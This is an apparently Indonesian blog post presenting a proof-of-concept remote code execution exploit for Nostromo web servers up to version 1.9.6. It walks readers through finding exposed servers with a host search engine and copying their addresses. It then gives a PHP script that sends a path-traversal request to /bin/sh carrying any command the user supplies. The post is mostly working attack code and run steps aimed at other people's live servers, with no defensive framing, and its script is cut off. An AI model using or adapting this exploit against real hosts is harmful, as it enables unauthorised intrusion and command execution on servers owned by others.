Nostromo <= 1.9.6 Remote Code Execution

Hello gaes, udah lama nih w gk post hahaha
Kali ini w mw post poc rce bug dari Nostromo
Simak ya :D

1. Go to
2. Fill Query: "Server: Nostromo"

3. Click

4. You will open the new tab copy IP:PORT
5. Create a file in your vps/termux/ whatever 
$hos = $argv[1];
$cmd = $argv[2];

$po = explode(":", $hos);
$fp = fsockopen($po[0], $po[1]);

fwrite($fp, "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n");
fwrite($fp, "Content-Length: 1\r\n\r\necho\necho\n{$cmd} 2>&1");

while (!feof($fp)) {
 echo fgets($fp, 1024);

6. Now Run The file : php file.php IP:PORT "COMMAND

DOCUMENT_ROOT: /www/htdocs


- Rintod

0 Response to "Nostromo <= 1.9.6 Remote Code Execution"

Post a comment

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel